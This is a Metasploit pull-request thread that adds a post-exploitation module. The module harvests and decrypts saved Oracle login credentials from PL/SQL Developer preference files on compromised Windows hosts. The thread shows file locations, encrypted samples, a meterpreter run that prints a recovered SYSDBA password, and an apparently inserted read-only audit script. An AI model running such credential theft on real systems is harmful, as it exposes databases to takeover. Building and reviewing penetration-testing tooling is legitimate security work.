
Add Module for PL/SQL Developer to gather credentials #18491

Merged
merged 8 commits into rapid7:master, Nov 9, 2023

Conversation

@Jemmy1228 (Contributor) commented Oct 26, 2023

Add a post/windows/gather/credential module to gather history/credentials from PL/SQL Developer, which is a widely used tool to manage Oracle Databases.

This module can decrypt the histories and connection credentials of PL/SQL Developer, and passwords are available if the user chooses to remember.

Analysis of encryption algorithm here.
You can find its official website here.

The login credentials and histories are stored in user.prefs which can usually be found in following directories:

%AppData%\PLSQL Developer <Version>\Preferences\<username>\
%AppData%\PLSQL Developer\Preferences\<username>\
<installation path>\Preferences\<username>\

These are the default preference file paths, from the latest version to the earliest version.

An example of v8, v9 user.prefs would be

ID=PL/SQL Developer Preference File

[General]
Name=General user preferences
Enabled=True
Order=-1
Rules=

<Omitted>

[LogonHistory]
273645624572423045763066456443024120413041724566408044424900419043284194407643904160

[DSA]
<Omitted>

The lines in the [LogonHistory] section can be decrypted as described here, and the decrypted line in the example would be user/password@server.

An example of v14 user.prefs would be

ID=PL/SQL Developer Preference File

[General]
Name=General user preferences
Enabled=True
Order=-1
Rules=

[Preferences]
LastNewsItem=02112023
PlanViewType=0
LastNewsRead=02112023

[Connections]
DisplayName=Imported Fixed Users
IsFolder=1
Number=0
Parent=-1
Username=
Database=
ConnectAs=
Edition=
Workspace=
AutoConnect=0
ConnectionMatch=536870911
Color=65535
DisplayName=Imported History
IsFolder=1
Number=1
Parent=-1
Username=
Database=
ConnectAs=
Edition=
Workspace=
AutoConnect=0
ConnectionMatch=536870911
Color=65535
DisplayName=Test
IsFolder=0
Number=2
Parent=1
Username=sys
Database=ORCL
ConnectAs=SYSDBA
Edition=
Workspace=
AutoConnect=0
ConnectionMatch=536870911
Password=2712415444684238431240824204
IdentifiedExt=0
Color=65535

<Omitted>

The Password in the [Connections] section can be decrypted with the exact same algorithm described above.

Verification

List the steps needed to make sure this thing works

  • Download and install PL/SQL Developer 14 or earlier versions.
  • (Optional) Change the PL/SQL Developer preference to save the passwords.
  • Use PL/SQL Developer to log in to oracle databases. Or add a connection in PL/SQL Developer manually.
  • Get a meterpreter session on a Windows host.
  • Do: run post/windows/gather/credentials/plsql_developer
  • The username, password, SID of connections will be printed.


@github-actions bot

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@bwatters-r7 bwatters-r7 self-assigned this Nov 1, 2023
@bwatters-r7 bwatters-r7 added needs-linting The module needs additional work to pass our automated linting rules and removed needs-docs labels Nov 1, 2023
@github-actions bot commented Nov 1, 2023

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. These can be run from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

@bwatters-r7 (Contributor)

Also, I'm seeing warnings about single string matching:

modules/post/windows/gather/credentials/plsql_developer.rb - [ERROR] Rubocop failed. Please run rubocop -a modules/post/windows/gather/credentials/plsql_developer.rb and verify all issues are resolved

@Jemmy1228 (Contributor, Author) commented Nov 2, 2023

I later realized that the latest version (v15.x.x) of PL/SQL Developer has changed the encryption method. This module does not work for v15.x.x version of PL/SQL Developer. This should be the only version that used a stronger encryption method.

The v14.x.x version of PL/SQL Developer seemed to use the same encryption method that can be decrypted by this module, but the preference file structure has changed (I've not adapted the module to be compatible with v14 yet). It won't be too difficult to adapt.

But what is annoying is that I don't have installation packages of v9.x.x ~ v13.x.x, so I don't know what the preference file looks like in those versions, or from which version PL/SQL Developer made this change.

@bwatters-r7 (Contributor)

Hi there; I was able to grab the installer by backward surfing the download link and using version 14.04, but I was not able to go any further back to 13, so they may not be hosted or the naming convention might have changed.

I hit a couple of snags on this; I've suggested some error checking in the loop to find the file, but also, the config folder was not named as expected:

msf6 post(windows/gather/credentials/plsql_developer) > show options

Module options (post/windows/gather/credentials/plsql_developer):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   PLSQL_PATH                   no        Specify the path of PL/SQL Developer
   SESSION     2                yes       The session to run this module on


View the full module info with the info, or info -d command.

msf6 post(windows/gather/credentials/plsql_developer) > run

[*] Gather PL/SQL Developer History and Passwords on DESKTOP-D1E425Q
[-] Failed to find C:\Users\msfuser\AppData\Roaming\PLSQL Developer
PL/SQL Developer History and Passwords
======================================

History
-------

[*] Post module execution completed
msf6 post(windows/gather/credentials/plsql_developer) > set PLSQL_PATH 'C:\Users\msfuser\AppData\Roaming\PLSQL Developer 14'
PLSQL_PATH => C:\Users\msfuser\AppData\Roaming\PLSQL Developer 14
msf6 post(windows/gather/credentials/plsql_developer) > run

[*] Gather PL/SQL Developer History and Passwords on DESKTOP-D1E425Q
[-] Failed to find C:\Users\msfuser\AppData\Roaming\PLSQL Developer
PL/SQL Developer History and Passwords
======================================

History
-------

[*] Post module execution completed
msf6 post(windows/gather/credentials/plsql_developer) > 

I was not able to get this to work because the config file was not populated. Is there a way to populate it without actually authenticating? If not, could you send us a dummy file to [email protected]?

@Jemmy1228 (Contributor, Author) commented Nov 7, 2023

@bwatters-r7 Sorry for the late response, but I managed to figure out the structure of PL/SQL Developer preference file now.

For older versions, the directory is PLSQL Developer, and the credentials can be found in the [LogonHistory] section of the preference file. Contents in the [LogonHistory] section are plain encrypted strings like username/password@SID AS SYSDBA.
For newer versions, the directory became PLSQL Developer {version}, and the credentials moved to the [Connections] section, where the contents became something like key-value pairs. (But the whole file is not INI compatible, so I didn't use INIParser to read this file.)

I've updated the module to handle both kinds of preference files; it should now work for version 14 and earlier.

I haven't reverse engineered the encryption algorithm in v15; the module will show a warning when trying to decrypt a v15 encrypted password.
It should now work with v15 new encryption algorithm.
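Both layouts described in this thread (the v8/v9 file with its [LogonHistory] blobs from the PR description, and the v14 file with its key-value [Connections] records from the comment above) can be walked with a small read-only parser. The Ruby script below is an added example, not the module's code or anything from the PL/SQL Developer project. It inventories which connection entries in a user.prefs file carry a saved password and how many encrypted history lines exist, rebuilding folder paths from the Number/Parent fields, and it deliberately decrypts nothing; the point is to find where stored credentials sit so they can be removed or the "remember password" preference disabled. The two sample files embedded in it are constructed from the excerpts in this thread and trimmed to the keys the audit reads; the function names are assumptions of this example.

```ruby
# Added example (not the Metasploit module's code): read-only audit of a
# PL/SQL Developer user.prefs file. It reports where stored credentials
# exist; it never decrypts a password.

# Constructed sample in the v8/v9 layout quoted in the PR description.
OLD_PREFS = <<~PREFS
  ID=PL/SQL Developer Preference File

  [General]
  Name=General user preferences

  [LogonHistory]
  273645624572423045763066456443024120413041724566408044424900419043284194407643904160
PREFS

# Constructed sample in the v14 layout, trimmed to the keys the audit reads.
NEW_PREFS = <<~PREFS
  [Connections]
  DisplayName=Imported Fixed Users
  IsFolder=1
  Number=0
  Parent=-1
  DisplayName=Imported History
  IsFolder=1
  Number=1
  Parent=-1
  DisplayName=Test
  IsFolder=0
  Number=2
  Parent=1
  Username=sys
  Database=ORCL
  ConnectAs=SYSDBA
  Password=2712415444684238431240824204
PREFS

# Keys repeat inside [Connections], so the file is not INI-compatible and an
# INI parser would collapse them. Each section is kept as an ordered list of
# [key, value] pairs; lines without '=' (the [LogonHistory] blobs) get an
# empty value.
def parse_prefs(text)
  sections = Hash.new { |h, k| h[k] = [] }
  current = nil
  text.each_line do |raw|
    line = raw.chomp
    next if line.strip.empty?
    if (m = line.match(/\A\[(.+)\]\z/))
      current = m[1]
      next
    end
    next if current.nil? # the ID= header precedes the first section
    key, _, value = line.partition('=')
    sections[current] << [key, value]
  end
  sections
end

# A new [Connections] record starts at every DisplayName line.
def connection_records(pairs)
  pairs.each_with_object([]) do |(key, value), records|
    records << {} if key == 'DisplayName'
    records.last[key] = value unless records.empty?
  end
end

# Folders reference their parent by Number; walk up to Parent=-1 to build
# the same "[Connections]/Folder/Name" path the module prints.
def display_path(record, by_number)
  parts = []
  node = record
  while node && parts.size < 64 # depth guard against a malformed cycle
    parts.unshift(node['DisplayName'])
    parent = node['Parent'].to_i
    node = parent < 0 ? nil : by_number[parent]
  end
  "[Connections]/#{parts.join('/')}"
end

# Returns the count of encrypted history lines and one entry per non-folder
# connection, flagging whether a Password value is present (never decoded).
def audit(text)
  sections = parse_prefs(text)
  records = connection_records(sections['Connections'])
  by_number = records.each_with_object({}) { |r, h| h[r['Number'].to_i] = r }
  connections = records.reject { |r| r['IsFolder'] == '1' }.map do |r|
    { path: display_path(r, by_number),
      username: r['Username'].to_s,
      database: r['Database'].to_s,
      connect_as: r['ConnectAs'].to_s,
      stored_password: !r['Password'].to_s.empty? }
  end
  { history_entries: sections['LogonHistory'].size, connections: connections }
end

if __FILE__ == $PROGRAM_NAME
  { 'v8/v9 sample' => OLD_PREFS, 'v14 sample' => NEW_PREFS }.each do |label, text|
    report = audit(text)
    puts "#{label}: #{report[:history_entries]} encrypted history line(s)"
    report[:connections].each do |c|
      puts "  #{c[:path]} #{c[:username]}@#{c[:database]} #{c[:connect_as]} " \
           "[#{c[:stored_password] ? 'SAVED PASSWORD' : 'no saved password'}]"
    end
  end
end
```

Run it as a plain script to see the two reports; to audit a real workstation, replace the embedded samples with `File.read` of the user.prefs paths listed in the PR description. Records are split on DisplayName because that is the first key of every entry in the v14 excerpt; a folder (IsFolder=1) is kept only for path building and never reported as a credential.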

@Jemmy1228 (Contributor, Author) commented Nov 7, 2023

I was not able to get this to work because the config file was not populated. Is there a way to populate it without actually authenticating? If not, could you send us a dummy file to [email protected]?

For older versions (like v8 v9), you can use the example in my first conversation. Just make a file with the name user.prefs and move it to %AppData%\PLSQL Developer\Preferences\<username>\

I have a copy of PL/SQL Developer v8, I can send it to the email address if you need it.

For newer versions like v14/v15, the installation packages are still available and can be installed directly.

@Jemmy1228 Jemmy1228 requested a review from bwatters-r7 November 8, 2023 04:44
@Jemmy1228 (Contributor, Author)

@bwatters-r7 I finally figured out how to decrypt the passwords for v15 of PL/SQL Developer by some reverse engineering and the module should be able to decrypt the credentials of any version of PL/SQL Developer now.

@bwatters-r7 (Contributor)

msf6 post(windows/gather/credentials/plsql_developer) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-D1E425Q
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-D1E425Q\msfuser
meterpreter > background
[*] Backgrounding session 1...
msf6 post(windows/gather/credentials/plsql_developer) > show options

Module options (post/windows/gather/credentials/plsql_developer):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   PLSQL_PATH                   no        Specify the path of PL/SQL Developer
   SESSION     1                yes       The session to run this module on


View the full module info with the info, or info -d command.

msf6 post(windows/gather/credentials/plsql_developer) > run

[*] Gather PL/SQL Developer Histories and Credentials on DESKTOP-D1E425Q
[*] Looking for C:\Users\msfuser\AppData\Roaming\PLSQL Developer 14
[*] Decrypting C:\Users\msfuser\AppData\Roaming\PLSQL Developer 14\Preferences\msfuser\user.prefs
PL/SQL Developer Histories and Credentials
==========================================

DisplayName           Username  Database  ConnectAs  Password  FilePath
-----------           --------  --------  ---------  --------  --------
[Connections]/Import  sys       ORCL      SYSDBA     oracle    C:\Users\msfuser\AppData\Roaming\PLSQL Developer 14\Preferences\msfu
ed History/Test                                                ser\user.prefs

[+] Passwords stored in: /home/tmoose/.msf4/loot/20231109111121_default_10.5.132.167_host.plsql_devel_107689.txt
[*] Post module execution completed
msf6 post(windows/gather/credentials/plsql_developer) > 


@bwatters-r7 bwatters-r7 merged commit b5aeab0 into rapid7:master Nov 9, 2023
32 checks passed
@bwatters-r7 (Contributor)

Release Notes

This PR adds a post/windows/gather/credential module to gather history/credentials from PL/SQL Developer, which is a widely used tool to manage Oracle Databases.
